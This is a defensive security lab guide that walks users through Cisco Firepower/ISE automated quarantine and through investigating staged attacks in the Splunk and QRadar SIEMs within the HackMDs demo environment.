1	Go back to your remote desktop session to the Contractor workstation. You should be back in a trusted state and connected to the hackMDS network. You can validate this in ISE if needed.
2	Open the Chrome browser on the Dr. Workstation.
3	In the top menu, choose the applications.ad.hack option.
4	This will bring up a folder that has a few options. The first is an eicar file, which is malware. Downloading this file will cause Cisco Firepower to evaluate the file and identify the system associated with the download as containing malware. Click the eicar_com.zip file to download that file. This action will once again cause the VPN to be disconnected. This time its Cisco Firepower’s Advanced Malware Protection AMP capability scanning the file and identifying it as malicious. Due to the risk this file poses on the user, Firepower has instructed ISE to terminate the VPN. Is this a useful action? Depends on how you want to leverage your ISE automation. Maybe the goal is if there is a risk, remove the VPN user to isolate the threat from the corporate network. We would recommend to include ISE posture features meaning allowing ISE to remediate the user, then allowing the user back on the network. For this lab, we will not be pushing any fixes. Optional: You are welcome to reconnect to the VPN and to click the Remediate Page to move the user back to the Permit + SCAN state and test other actions. In future labs, we will be adding integration with Cisco AMP, Cisco Umbrella and Stealthwatch, which will showcase other automated quarantine and remediation scenarios. These are just a few examples of what attackers could do using malicious software installed on a compromised host. Scanning networks and download payloads are very common tactics and something an IDS/IPS should be tuned to identify along with other internal monitoring technology such as NetFlow based security. Note: A real deployment of Cisco ISE would have VPN and ACL segmentation prevention this action. We didn’t enforce proper segmentation in this lab to keep the lab simple.

Defend Internal Attacks

In this exercise, the defenders do not have to do any manual steps to prevent Mr. White from stealing data from HackMDs. The Cisco Firepower and ISE solution automatically saved the day. This is a great example of the value from integrating pre and post access control security technologies. Next, we will view both Cisco Firepower and ISE technologies to see how this looks from the defender’s point of view.

Defend Internal Attacks--View Firepower Alarms

Procedure

1	Go back to the Jumphost. We are first going to review how these events look in Cisco Firepower. Note: If you are still in the RDP session from the last exercise, right-click and then close the session selecting “Close window”. You will need to select OK once prompted.
2	Double-click the Mozila Firefox icon to open a web browser if you already have not established a Firefox session.
3	Browse to https://198.19.10.5 or click the Firepower tab in the browser to bring up the Firepower management interface. Log in with user admin and password `C1sco12345`. Note: The defender part of this hands-on lab will just be policy and dashboard validation since this scenario is featuring automating defense. See other scenarios for hands on defense where remediation is not automated. Also know that in those other scenarios, you could have steps automated, which is best practice for real world deployments. This will bring up the Summary Dashboard. Tip: You can also click Overview and then select Dashboard to access the Summary Dashboard.
4	Let’s find the alarm that triggered the events you created as the compromised host. Click the Analysis tab, and then select Correlation Events.
5	This will bring up any events that would generate alarms to other systems like Cisco ISE. If you don’t see events, check the time on the right. To adjust the time, click the time and choose a longer duration such as 6 hours as shown. As you can see, the IP address 198.19.40.60 has been generating alarms as it scanned the 198.19.10.0 network. We can also see the person behind it is user Doogie Howser (dhowser). Tisk tisk Doogie. Note that the .40 network is the VPN network.
6	You can click the computer icon next to the 198.19.40.60 to bring up details on Doogie’s computer, which is causing some of the problems Cisco Firepower is telling Cisco ISE to remediate. This shows a popup window with the details of the system causing the problems. Notice profiled data is found through context shared from Rapid7 InsightVM when the device is evaluated upon connecting to the network. Also notice Cisco Firepower has passively profiled the device based on application layer data.
7	Next, close the popup window and click the computer next to the user that has been causing the problems aka doogie howser. Here, you will see details regarding the activities you performed as the attacker. In this next image, you will see an example of the payload you attempted to download and was identified as Malware noted as “Threat Detected in File Transfer” as well as the connection to the malicious source noted as “malware-cnc”.
8	You can validate how Firepower calls ISE by going to Lock Image, and selecting Integration.
9	Next, select Identity Sources > Identity Services Engine > Test to display that Identity Services Engine (ISE) is setup.
10	Click the Test button to confirm there is connectivity between Firepower and ISE.
11	The second part of the Cisco Firepower and ISE integration is to configure correlation rules. When these rules are triggered, Firepower will send the alert to ISE. Click Policies > Correlation to review these. Note: PxGrid is Cisco’s language used to share data between solutions. In this example, pxGrid is used between ISE and Firepower to share threat data. Many non-Cisco vendors such as Splunk and Rapid 7 can also leverage pxGrid. Firepower and Stealthwatch can both detect network breaches. Firepower’s strength is built on its ability to identify vulnerabilities, active systems on the network, known attack behaviors and monitoring any file with AMP. Stealthwatch strengths are true anomaly detection based on network base lining, monitoring for malicious actions and enabling the entire network to detect threats such as switches, wireless devices, virtual switches, and so on. Check out Scenario 5 for more details on Cisco Stealthwatch.
12	Click Rule Management and you will see the pxGrid rules. Click the pxGrid triangle if it isn’t already open to display the different integration rules that were built by the SOC administration. Their purpose should be interpreted by their name. The rules listed are designed around internal threat actions taken post breach such as internal reconnaissance and phoning back to a CnC server. The remediation rule specifies what to do when a malicious action is triggered. Feel free to click any of these to get an idea of how they work. In our next task, we will find out what Cisco ISE learned from this attack and how the integration with Firepower is enabled.

Defend Internal Attacks: View Cisco ISE Alarms

Now that we have validated the Firepower alarms, let’s look at how ISE can enforce access control on all systems attempting access to the HackMDs network. The idea is if Firepower identifies a threat from within the network, it will inform ISE to act on the event. In this example, that action is to kill the VPN connection and move the compromised device from the internal HackMDs network to a quarantine network that has limited access to remediation steps can be performed.

Note: Isolating the device is another option however, administrators would not be able to remotely remediate the system and any automated remediation processes such as download patches or updates would not be able to be performed.

Procedure

1	In the web browser, browse to https://198.19.10.4 to bring up the Cisco ISE management interface or click the ISE tab on the web browser. Log in with Username admin and Password C1sco12345.
2	View the main dashboard.
3	To view the logs, click the three lines, choose the Operations tab at the top of the window, and then select Live Logs.
4	Observe the latest ISE logs. You should see that there are a few VPN connections recorded from the user dhowser.
5	If dhowser is still connected to VPN, you might discover that there are few VPN connections recorded from this user. Observe that this user's current state in the system is Quarantine because the Authorization Policy enforced is VPN >> Quarantine Note: You could go back to the browser and click the Remediation page to change the status back to normal network access.
6	To view the ISE policy for VPN users, click the three lines, select the Policy tab, and then choose Policy Sets.
7	You will see the VPN Policy and default policy. This lab is very basic, featuring only a VPN policy. Best practice would be to also secure the LAN and wireless networks, which could have similar or different evaluation criteria depending on your business needs.
8	To view the VPN policy, scroll to the right. Notice the “Hits” category shows how many times a policy is enforced. Click the carrot under the “View” category to see the details of this policy.
9	To view any of the policies, click the carrot next to the policy name. Select the carrot for Authorization Policy – Global Exceptions to view its details. Note: You will notice that one active policy is designed to take action on any device that equals the Quarantine policy. The second policy is not active represented by a grey circle with a slash. This policy is designed to integrate with Rapid7’s InsightVM vulnerability scanner. This non-active policy will inform ISE to quarantine any device found to have a vulnerability that is greater than 7 according to InsightVM’s threat ranking system. This is ideal for ensuring that all devices that access the network do not introduce critical vulnerabilities to your network. We will enable and test this policy later in this lab. This is a good spot to use profiling to validate what a device is, build posture profiling to check for updates, ensure security is enabled such as antivirus and many other things. For our lab, we will show one example of this by kicking off a Rapid7 InsightVM scan when a device connects. It is common for posture policies to check for Windows / MAC updates and if antivirus running as well as up to date.
10	Click the carrot to close this policy. Next scroll down to the next click carrot to view the main ISE authorization policy. Note: You will notice there are policies that validate a user is part of the HackMDS active directory list as well as that their system is trusted by validating the existence of a specific certification. This ensures the user is an employee and using an authorized device to VPN into the network. This prevents a trusted user from using their personal system or if somebody attempts to access the network with a stolen trusted laptop since they wouldn’t know how to login as an employee. Other policies explain what ISE will do when a system meets or doesn’t meet the posture checks previously viewed.
11	Now we will view the profiling options within ISE. Profiling could also be used as part of a policy, such as identifying when a mobile phone or tablet attempts to access the network. This is ideal for creating things like a bring your own device (BYOD) policy. To bring up this section, click the Policy tab and select Profiling. Note: An example of ISE profiling would be a device connects and the linkup trap would indicate a device has connected. This could give away the make of the device based on the NIC card manufacture however, more data would be needed to get greater details. At this point, we could know it’s a MAC verses Windows device. Later, the device will likely open a browser showing DHCP information. This could change the MAC version to an iPhone based on the version of Safari browser IE DHCP information seen. Profiling is an ongoing process. For example, if a device is seen as a printer and later other data such as DHCP info indicates a contradiction, ISE will adjust the policy. This is how attacks like spoofing a trusted device are prevented by Cisco ISE. This brings up the hundreds of device profiles available in Cisco ISE. Any of these could be used to create very specific checks such as looking for gaming systems or something more generic like any Apple product. Take a moment to scroll down and view the different types of devices Cisco ISE can auto detect. To learn how ISE can profile a system, let’s look at the network probes used for identifying systems.
12	To learn how the Profiler identifies devices based on network traffic, click the three-lines menu at the top left, and then go to Administration > System > Deployment.
13	This will bring up the ISE server. Next to the ISE name (we didn’t use a creative server name), click the check box, and then click Edit to bring up the server details.
14	Click the Profiling Configuration tab to see how profiling is configured for this server.
15	Observe that this brings up the various protocols ISE profiling uses to see traffic. You will see things like DHCP, HTTP and so on checked representing the types of protocols that provide data to ISE.
16	Let’s explore another useful way you can view profiling data. Click the three lines, choose Context Visibility, and then select Endpoints. This will bring up a visibility dashboard regarding exactly who and what has been accessing the network. You can view the MAC addresses, hardware models based on profiled data and usernames based on login credentials. This is a critical page that could be printed as a live report showcasing what is on the network!
17	As an example, choose Endpoint Classification to pull up results about how ISE has profiled each device connected to the network.
18	You can even pull up details on the type of software and applications installed on any host that was evaluated by Cisco ISE. Click the three lines menu at the top left. Under Context Visibility, select Applications.
19	Here, you have details regarding what is installed on systems connected to the network Note: This is just a basic demo of the power of having other systems call in ISE for remediation. Many Cisco and non-Cisco solutions can support this integration.

Congratulations! You have completed this scenario.

Summary

This scenario provides a small sample of the power of integrating Access Control technologies, such as Cisco Identity Services Engine, with Next Generation Intrusion Prevention found within Cisco Firepower, as well as other industry leaders like Rapid7 InsightVM, to identify vulnerabilities. Attackers will use a variety of methods to breach your network and steal your data. Best practice is provisioning security for before, during, and after the attack.

Integrating solutions, such as automating remediation with the “Before” technology (ISE in this example) with any “During” or “After” technology (Firepower in this example). Integrating vulnerability scanners helps ensure all systems are scanned upon connection, as well as automating incident response when a system is found to contain a critical vulnerability.

Congratulations! You have completed this scenario.

Centralized Defense: Centralize Event Data (Splunk and IBM QRadar)

Value Proposition: The key to responding to a cyber incidence is being able to quickly Scope, Contain and Remediate the threat. This requires a method of notification to announce that a threat has potentially occurred, as well as enough data for you to understand the situation so you can appropriately and efficiently respond. Many organizations have the right tools; yet, they still find incident response challenging due to an overdose of silo product management interfaces providing information chunks that require you to manually stitch together everything to truly understand the scope of the event. This is where the value of a Security Information and Event Management (SIEM) tool shines.

In this scenario, you will be using the HackMDs SIEM (Splunk or QRadar) to view various types of attacks that have been identified with Firepower, Identity Services Engine (ISE), Advanced Malware Protection (AMP) and Stealthwatch. You will also look at potential weaknesses within the HackMDs organization based on vulnerability data seen by Firepower and Rapid7’s InsightVM. Tasks will include using prebuilt dashboards and searching across multiple datasets to identify the potential threats to the HackMDs environment.

Outcome

At the end of this scenario, you will have accessed Splunk or QRadar and investigated different security events using existing dashboards and native mining techniques. First, you will investigate an insider threat based on concern of unauthorized remote connections to the inside network, suspicious reconnaissance and exfiltration behavior seen by Stealthwatch and Firepower.

Next, you will review the exploitation of a struts vulnerability found on your DMZ server. Lastly, you will investigate a compromised VPN host that was removed from the network by Cisco ISE based on Firepower alerts. You will have leveraged various Splunk or QRadar applications, a HackMDs SOC dashboard and native mining techniques.

Lab Resources

SIEM: Splunk, IBM QRadar
SIEM data resources: Firepower, ISE, AMP, Stealthwatch, InsightVM
Installed Splunk Applications: Cisco Stealthwatch App, Cisco ISE App, Cisco eStreamer eNcore App, Rapid7 InsightVM for Splunk app, osquery App for Splunk, Cisco Firepower App for Splunk, and Cisco NVM App
Installed QRadar Applications: Pulse, ODI, Cisco ISE, Cisco Firepower

In this lab, you are the Tier 1 HackMDs SOC engineer responsible for monitoring and responding to security events. You have recently deployed a SIEM and installed applications available for security products existing within your environment. You have also created a HackMDs SOC Alarm Dashboard based on common data sets you would like to continuously monitor. Your job is to identify malicious behavior and either open a support ticket or classify it as a false positive. You do not have authorization to log into any of the management interfaces for any security products hence your SIEM is your lifeline to any activity within the environment.

Note: You could leverage orchestration tools such as Phantom or Exabeam to automate your response to an incident. You could also leverage access control technology such as Cisco ISE to quarantine any device found by the SIEM to be malicious in behavior. For this lab, you will not be remediating any threats.

Attack Data in Splunk

For this lab, we have not created fake attack data. Instead, we have launched all the attacks you have executed in other CDC modules at a specific point in time. Your first task will be to change the time in Splunk to the window of time we launched the various attacks. This will permit you to quickly start your investigation without having to simulate the attack behavior. You are welcome to perform other CDC modules to learn more about how to deliver the attacks you are now going to investigate.

Note: Important: If you performed Scenario 3 (Smash and Grab), Scenario 5 (Insider Threats) and Scenario 6 (Controlling Access and Monitoring for Malicious Threats) prior to starting this lab, you do not have to change the time of Splunk and can just search for the last 24 hours to see your attack behavior for any of the exercises in this lab (default setting for time). If this applies to you, you can just use the default time, which is 24 hours. This should have the attacks you performed within Splunk’s data history. If you have not performed those scenarios, following the next steps when searching in Splunk to ensure you have all historical data for the entire year.

Tune the time in Splunk

Procedure

1	Connect to the Jumpost.
2	Open a web browser, and then select the Splunk tab or go to https://198.19.10.15:8000.
3	Log in with username admin and password C1sco12345!
4	Adjust the time so the attack data exists within Splunk: Locate the Search drop-down menu that changes the time of the data you are searching currently showing “Last 24 hours”. Click this, and then select the carrot for Date Range.
5	To change the date, select Between, and then choose 07/10/2020 and 7/29/2020.
6	Click Apply. This will display all the data during that time including the attacker data.
7	Note that you will need to do this in any new tab. The next image is an example of adjusting time in a general search window.

Splunk Overview

Splunk can be setup to look and feel according to your needs. For HackMDs, we have built a landing page that features widget continuously running searches on important data points from each Cisco security product as well as InsightVM. The top part represents Stealthwatch data followed by Firepower, ISE and finally Rapid7’s InsightVM. Each data section is labeled accordingly. The true value of a SIEM is not focusing on a specific product data. The value of a SIEM is looking across multiple datasets meaning evaluating context of various event records however, we have designed the HackMDs dashboard in this fashion to help you understand where the data is coming from as you perform an investigation. You are welcome to view and edit any search on this dashboard as you work through the lab.

The left panel of the Splunk landing page represents applications installed into Splunk to provide additional value. Splunk is known for its application community, which can be found by searching publicly available apps selecting the Apps icon and choose to browse available apps or online at splunkbase.splunk.com. For this lab, we have installed an app for each of our Cisco and Rapid7 technologies. All apps outside of the Cisco Stealthwatch app are found on the Splunkbase community. Click any app on the left to launch and investigate the data it is designed to manage. Some apps may be different in your build.

Many Splunk administrators will start by using the native Search and Reporting features.

Procedure

Click Searching & Reporting to bring up a blank search Window and Data Summary button.

Search for “index=*” to see all data records within Splunk from any device.

Notice that on the left are data fields that you can click to add items to your search and quickly narrow down your results to an area of interest. You can also look at fields in the raw data and add those to the search. For example, you could add “dest_=ip=*” which would include any record with a destination IP address log in this format.

Results can be converted into the widgets like what is found on the HackMDs dashboard, reports or used as investigation points for other events. In the next screenshot, the source port of the log is highlighted, which is another item that could filtered by using “source = udp20514”.

Let’s start using Splunk to investigate a few security incidents.

Investigate an Insider Threat

For our first investigation, we will look for the attack performed in Scenario 5 “Identifying an insider threat”. The attacker has accessed the inside network using RDP (3389/tcp) with stolen credentials. Once inside the 198.19.30.X network, the attacker performed scanning to find other systems to latterly access leveraging the same stolen administrator credentials used to access the inside network. The attacker’s goal is to capture sensitive data by pivoting into the HIPAA network (198.19.10.x). Once the attacker compromised a system within that network, the attacker identified sensitive data on that system and exported it off the network using FileZilla. You job is to identify the Remote Desktop behavior (3389/tcp), internal recon, pivot, and exfiltration activity using the Stealthwatch data found within Splunk.

Procedure

1	Let’s start off by accessing Splunk and then viewing the HackMDs SOC Dashboard that displays after logging in. Once again access Splunk using the browser fast link and log in with admin C1sco12345.
2	Set the time to “07/01/2020 and 8/01/2020” using the time adjustment button at the top of the main dashboard. You can leave it at 24 hours if you had performed the previous CDC scenarios today. At the top of the dashboard, you should see many of the categories you would find in the Stealthwatch dashboard have been added to Splunk. You should also see summary charts of the top attack categories and IP addresses.
3	There are many ways to investigate any of the previously described malicious behaviors with the tools at hand. We will start this way: Click the Recon widget, and then choose to open a search using the magnifying glass.
4	This will open a new window showing the contents of the Recon widget including the time range you had previously set. This widget counts the number of Stealthwatch logs with the field “cat=Recon” meaning any log from Stealthwatch (198.16.10.6) with cat=Recon (category is Recon) will be counted. You will see this formula in the search window. Remove “\| timechart span=1d count” since we don’t need to count occurrences then click search via the magnifying glass or just hit enter. Notice that you now see the Events section on the left, which includes raw log data and various fields. You should see one cat or “category” and you can see this data is coming from host 198.19.10.6 representing Stealthwatch. Next, let’s look at attacker sources. You can find this by looking at src since that is how the record shows sources. You can see this type of language by examining event logs. You can do the same to find things like the destination (dst), destination port (dstPort) and so on. It’s all based on how the data is parsed by Splunk. Here is an example of one of the many logs you should be seeing. The log may be slightly different but what is important is identifying the host and source of the activity.
5	To view the attacker sources with any log from Stealthwatch, lets add `src=*` to our search representing all sources. Your search should now look like this. Hit enter to see the results.
6	Now, look to the left and identify the new src field. Click it to see a list of the IP addresses performing Recon. Looking at the CDC diagram, take a look at any inside IP address, such as the 198.19.X.X address. Any other address presents devices on the Internet, which it is expected to see that type of activity. Looking at only the 198.19.X.X addresses, you identify all of the 198.19.10.X devices as assists within your HIPAA environment that are all security tools such as Cisco Firepower, Private AMP and so on meaning they would be expected to perform Recon from time to time. There is one insider that is a user address represented as 198.19.30.100. This should stand out being it’s the only inside IP address that is not a security tool performing active reconnaissance. This device may be compromised as this is typically activity seen by malware and insider threats. Click that IP address to pull up details on this system. You should see details on this system in regard to Recon. It looks like targeted Recon which could mean a compromised system. This is how compromised systems find other systems to infect or pivot over to.
7	Let’s see what other alarms this system has triggered. We can do this by changing “`cat=Recon`” to “`cat=*`” meaning searching for any category of threat from this IP address using only the Stealthwatch data (host=”198.19.10.6”). You search should look like this. Click enter or the magnifying glass to see the new results.
8	You should now see similar logs however, now you have any event category verse being limited to just Recon. To get a quick look at what type of event categories have been generated by this host, click the “cat” field. You should see there has been some Host Lock Violations along with Recon and other attacks. Let’s look more into the Host Locks by clicking the Host Lock Violation value. These represent violations of HackMDs policy. This will narrow your search down to only Host Lock Violations. Looking at the events logs, you should what caused the Host Lock alarms. Here is an example of a Host Lock Violation stating remote-desktop (3389) was used from this system to a system within the HIPAA network! Remember, 198.19.10.X is the sensitive HIPAA network so this is a log of the pivot from the 198.19.30.X network. You will want to investigate 198.19.10.101 to see if there has been any activity reported from this system. This is the compromised device within the HIPAA network that was connected to by 198.19.30.100.
9	We need to see what potential damage may have been done within the HIPAA network. Let’s change `src=198.19.30.100` to `src=198.19.10.101`, change `cat=` and delete the other data in the search so you can see any events from this compromised system. your search looks like this. Now you should see different logs for suspect data loss and data exfiltration. This means data has left the trust HIPAA network through this system that was connected over RDP. This is really bad. You can also click the “cat” field to see this as well. Your response as a SOC admin to this situation could be anything from leveraging an orchestration tool integrated with Splunk, use Cisco ISE to auto quarantine anything with a high concern index from Stealthwatch, isolate the compromised systems or so on. As a Tier 1 SOC administrator, you will need to escalate this as a real event to management. It is important to point out that you could have discovered this attack data using many other methods. The Top Attackers diagram shows a bunch of addresses yet one is inside your network. That could have triggered the search as shown. You could have started with Exfiltration or Suspect Data Loss alarms and worked backwards. You could have even started with a general search of cat= to pull up the top attack threats being seen and work from there. These are example widgets you could have used to kick off your investigation. Feel free to perform your own search and see if you can find the same attack behavior.
10	Splunk has applications you could use verse the native searching and dashboards. The Stealthwatch app is built internally by Cisco and beta at the time of publication and contains a ton of search options. Click the Splunk logo at the top to access the main page and select the Splunk app.
11	Use first tab lets you search an IP address of Interest. Try searching 198.19.10.101, and then click Submit.
12	Scroll down and you can see a summary of data including the alarms we previously investigated. Feel free to explore this app. We will touch upon this and a new Firepower app later in this lab.

Investigate Exploitation Behavior

For our next investigation, we will look at attack behavior executed during the Smash and Grab activity. The attacker is performing a Smash and Grab meaning targeting anybody on the Internet with a specific vulnerability. In this example, the vulnerability is a Struts2 vulnerability, which exists on a server within the HackMDs DMZ. That DMZ has been exploited and the attacker has opened a terminal with root level access. This is like many attacks such as the SAMSAM ransomware abusing jboss.

Procedure

1	Let’s start off by examining Firepower data within the HackMDs SOC Alarm Dashboard. Log into Splunk and view the main landing page. Adjust the time range to the first week in July (07/01/2020 and 08/01/2020) similar to what was done earlier in the lab. The top part of the HackMDs SOC Alarm Dashboard represents Stealthwatch data used in the previous exercise. If you scroll down, you will notice the second layer of data represents what was pulled from Cisco Firepower data as shown. The start of this area is labeled Firepower Data. The data shown will be different depending on the type of events being seen. For example, if you have not performed the Smash and Grab lab, then Firepower is configured in an IDS mode and will not be blocking events hence why there will be a low IPS Block Events count if that lab is skipped. For now, let’s focus on finding potential successful exploitation behavior against your systems.
2	First, let’s look at the top Indication of Compromise by Host widget. These systems show potential exploitation behavior. There should be a few, which any that are outside systems need to be invested. Click magnifying glass to bring up “Open in Search”
3	In a new window you will see IP addresses of interest at the bottom. Let’s first look at the outside IP address 198.18.133.6. Click it and select View events. This will show this outside IP address has connected to an internal system. Not good! Looks like we have a breach!
4	Let’s look into the 198.19.20.5 aka the victim of this attack. Click the IP address and choose to View events. Looking at the details around this IP address, you will find there was a SERVER-APACHE Struts exploitation, which Attempted Administration Privilege Gain, as well as similar alarms in other logs regarding remote exploitation.
5	Observe that there are other ways you could have found the exploitation behavior. To the right of the widget you used for the last exercise are two other event widgets. One focuses on specific events while the other focuses on event categories. Both show exploitation behavior. You should see under Top Events the specific struts attack. Click that alarm.
6	Here, you will see all events associated with the struts exploit. If you click the dest_ip field on the left, you will pull up all associated victims of this attack including the system you saw in the previous investigation.
7	Go back to the main Splunk dashboard, scroll down to the Firepower section and look at the Top Events Classes. You will see there are attempted privilege gain alarms meaning somebody is exploiting a system with the goal of gaining administration access. Click the attempted-admin alarm class to pull up those events.
8	Once again, click the dest_ip field on the left to view the impacted devices. This time you not only see the 198.19.20.5 device that was exploited but you also will see the exploited 198.19.30.100 inside device that you found was exploited during the Stealthwatch lab. Using this investigation approach would not only alert you to the struts exploitation activity, but also the follow up insider threat activity which is also aimed at gaining administration access to internal systems. These are just a few ways you could have investigated the exploitation behavior using the Firepower logs within Splunk. There are also widgets found on the Splunk Firepower Dashboard as well as the Firepower Splunk application we will cover later in this lab.

Investigate Compromised Laptop

For our final investigation, we will be looking at an event that was auto remediated by ISE. A user with a compromised / infected laptop accessed the HackMDs network. That laptop started performing port scanning as well as attempted to download malicious software. Firepower saw this behavior and used PxGrid to inform ISE this asset needs to be removed from the network. Let’s look at this situation from Splunk’s point of view.

Procedure

1	Log in to Splunk and look at the main HackMDs dashboard. Make sure the time is set properly if you have not performed the previous scenarios today. If you scroll down past the Stealthwatch and Firepower data, you will see ISE data starting with the tile ISE Data.
2	Since want to investigate violations in the ISE policy (meaning ISE has auto-quarantined a system). To do this, let’s search the widget that contains this data. Click the widget, and then select Open in Search.
3	This will bring up a search, which includes counting the number of ISE quarantine actions. Remove \| stats count as Total so we can focus on the data without counting the events. Your search should look like the following. Now you should see the log details. There are a few places to see who is behind the message. You can look at the raw event data and look at the bottom or within the log for the user name and system. You can also click the fields on the left and see summary of Endpoint and User_Name. You should find the user behind the alarm is dhowser and his IP address is external 198.18.133.10. and
4	This IP is an outside IP address, so we need to find its inside IP address via NATing performed by the VPN concentrator. Let’s search for this using the outside IP address and searching the NAT field. Search everything using index=, put in the outside IP address 198.18.133.10 and include the field ASA_NAT_IP=* which is searching the VPN concentrator aka our ASA for the NAT for this address. Your search should now look like the following. Note: There is also a widget on the main HackMDs Dashboard that shows all NATing within the ASA. You should see the logs of the user dhowser connecting and IP NAT to 198.19.40.5X. For this example, dhowser has the IP address 198.19.40.51.
5	Finally, let’s look for alerts caused by dhower’s inside IP address. Most likely, Stealthwatch or Firepower saw some malicious behavior and triggered ISE to quarantine this user. Search everything index=, the inside IP address (inside IP address you found) and Firepower_Alarm=, which represents any alarms from Firepower. You search should look like this.
6	You should see Firepower alarms from this IP source. To get a quick summary, click the field Firepower_Alarm and you should see a few items or concern. Let’s look at the Malware Cloud Lookup event since that seems the be the only malicious action. The log that comes up explains what happened. You can see a malicious file was detected during a download action, the hash of the file, cve file name (W32.2546DCFFC5), location of where the file is hosted on the web and a message log explaining malware was found. This action seen by Firepower caused an alarm sent to ISE to have this device removed from the network. Remember, for this lab, HackMDs has Firepower configured in IDS mode meaning it let the threat through, used retrospect security to test the file that was downloaded and alerted ISE that this system has malware. Best practice would be having Firepower in IPS mode prevent the file from being downloaded however, we are demonstrating how an IDS could detect internal malicious activity and leverage Cisco ISE as a remediation option when threats make their way onto the network.

Splunk Applications

Our final Splunk topic is Splunk Applications. Splunk is known for its user-based app development community found at splunkbase.splunk.com. Splunkbase features hundreds of apps covering pretty much every vender and technology concept used in the IT industry. For example, searching the term Cisco within Spunkbase brings up around 65 different applications. Feel free to search Splunkbase for technology and concepts used within your work environment to see what apps are available.

Procedure

1	For this next exercise, we will look at the Cisco Firepower App for Splunk. This application can be found installed within our Splunk build via the last application at the bottom of the app lists. Click the tab to open it.
2	You will see a dashboard dedicated to managing Cisco Firepower network event data. By default, all data displayed is dated back 24 hours. You can use the search and dropdown table located at the top of the dashboard to zero in on data of interest, such as the attacker IP used in previous labs. For example, you should see the attacker’s system IP address of 198.18.133.6 if you have performed an attack or adjusted the time to when we delivered the attacks. Click that IP address to pull up more details on this host. From here you will see details on any incident associated with this IP address. If you click any details, it will cross-launch Cisco Firepower so you can dig further with Cisco Firepower like we did in the Smash-n-Grab lab.
3	Next let’s go to the top of the page, click Threats, and then choose Intrusion Events to bring up the Intrusion section of the application. Here, you will see a summary of intrusion events found by Cisco Firepower. If you scroll down, you will find more details on threats. Feel free to click any of these items to learn more about the events.
4	Click Network to see the Network section of the application. Note that this part of the application shows a summary of the type of network traffic seen by Firepower. Feel free to explore this application. It was designed for quickly searching specific types of data that are common for security operation centers to monitor. This application showcases the power of the Splunk application network, which has hundreds of customized applications that enhance the value provided by Splunk. The steps above summarize hunting for a few very specific attacks within various logs digested by Splunk. A real world SOC would likely start with monitoring all events and hunting for anything seen as critical verse knowing specific threats to hunt for. Most SOCs would leverage data correlation between products verse isolating data as we did for these exercises. For example, having the ASA NAT records mixed with other data would simplify stitching attacker outside and inside IP information. Blending Firepower and Stealthwatch data would provide even more details about an event, much like how you saw both systems had events regarding the unauthorized RDP connections.

NVM Module App for Splunk: Overview

Another very cool feature is the ability to analyze and correlate user and endpoint behavior using the AnyConnect Network Visibility (NVM) app within Splunk. Imagine being able to collect details about users, the device AnyConnect is installed on, what applications are running, destination for flows within or outside your network to name a few items you typically wouldn’t be able to see without host level behavior visibility. This is a huge compliment signature-based security tools such as antivirus.

Procedure

To view the Cisco NVM app, click the Cisco NVM Dashboard app on the bottom right of the main dashboard.

You will see a high-level dashboard breaking down NVM topics into multiple categories. Clicking a category will bring up that specific dashboard. Let’s first look at the devices.

In other labs, we had to investigate websites HackMDs employees visited. Using the NVM app, you can quickly view the websites Dr Howser has visited by clicking his name and then scrolling down to see those websites. This can be useful when identifying top sources or if there is questionable activity from a host.

At the top of the App is an NVM Analytics Dashboard drop-down menu. When you click this, you will see there are a dozen dashboards to check out. One interesting one is the process listing. Click that.

There are a few labs where you need to figure out where malware installed on a compromised system is located and what type of communication and changes its making on host it is installed on. The NVM module can easily show this activity. Remember this as you work through some of the other challenges and hunting labs. For example, do you remember the process of interest that was running when the Telsacrypt ransomware was installed?

Feel free to start with the HackMDs SOC Alarm Dashboard and investigate any alarms that seem interesting. You can also investigate alarms found within the installed applications listed on the left-hand side of the Splunk main dashboard. The NVM and Firepower Apps are just a few we touched on however, there are hundreds of applications available within the Splunk community. Take some time to click around. Happy Splunking.

IBM QRadar Lab

Attack Data in QRadar

For this lab, we have not created fake attack data. Instead, we have launched all the attacks you have executed in other CDC modules at a specific point in time. For some of the data modules, you will need to adjust the time to July 01 to August 1st, 2020, in order to see the attack data unless you have created the data yourself while working on other CDC modules. You are welcome to perform other CDC modules to learn more about how to deliver the attacks you are now going to investigate.

Important:

If you performed Scenario 3 (Smash and Grab),Scenario 5 (Insider Threats) and Scenario 6 (Controlling Access and Monitoring for Malicious Threats) prior to starting this lab, you do not have to change the time of any QRadar module and can just search for the last 24 hours to see your attack behavior for any of the exercises in this lab (default setting for time). If this applies to you, you can just use the default time, which is 24 hours. This should have the attacks you performed within QRadar’s data history. If you have not performed those scenarios, make sure to adjust the data for widgets so the dates are between February 15 and March 1st.

QRadar Overview

IBM’s QRadar is SIEM designed for security awareness and compliance support. QRadar uses a combination of flow-based network knowledge, security event correlation, and asset-based vulnerability assessment. Let’s touch a few key areas of QRadar before starting our investigations. Notice on the dashboard are widgets. We will be using these to hunt for events shortly.

Procedure

1	Let’s start off by accessing QRadar (qradar.ad.hackmds.com) and viewing the different dashboards. Access QRadar using the browser fast link and login with `admin C1sco12345`.
2	When you log in, you will notice you start out on a dashboard. There are many default dashboards that can be customized, or a new dashboard can be created such as the one we created called HackMDS SOC View. Dashboards are made up of widgets, which represent specific search data such as “Top IPS Events.” If the HackMDS SOC View dashboard isn’t up, click it under the Show Dashboard drop-down to bring it up.
3	Note that all the widgets are based on active searches. You can search for pretty much anything collected by QRadar and turn it into a widget. You will try this out during the instigation part of this lab. Now click the Offenses Tab.
4	You can see that this shows the top offenses you should look into if you are responsible for security at HackMDS. Think about this tab as the top things to investigate right now. On the left are different focus areas including categories of offences, top sources and destinations, which may be of interest to review. Next click the Assets tab.
5	Click the Assets tab at the top of the page to see a list of any device(s) seen by QRadar. You can setup QRadar to scan networks for new devices to help maintain an inventory of what is on the network. You should see results from scanning the HackMDS network.
6	QRadar also offers integration with leading vulnerability scanners or can use a built-in scanner to scan assets for weakness. For this lab, we have integrated Rapid7’s InsightVM to provide this data. One powerful feature is the ability to launch Rapid7 InsightVM scans from the QRadar dashboard. You should see vulnerability data associated with assets identified by InsightVM. Click the system with the most vulnerabilities, which in this example is 198.19.30.100. This example system shows over 2000 vulnerabilities! To bring up the details found by both InsightVM and QRadar, click the system IP address and scroll down. Notice you can see the vulnerability details associated with this system including the risk score of each potential vulnerability. Somebody should really patch this system at some point! QRadar has optional plugins that can be installed to provide additional value. There isn’t as many application options as Splunk offers and modules have limitations for customization but the applications such as Pulse can be very useful. We will view QRadar applications later in this lab. Now it’s time to start our investigation. Let’s first look into the insider threat from Scenario 5.

Investigate an Insider Threat

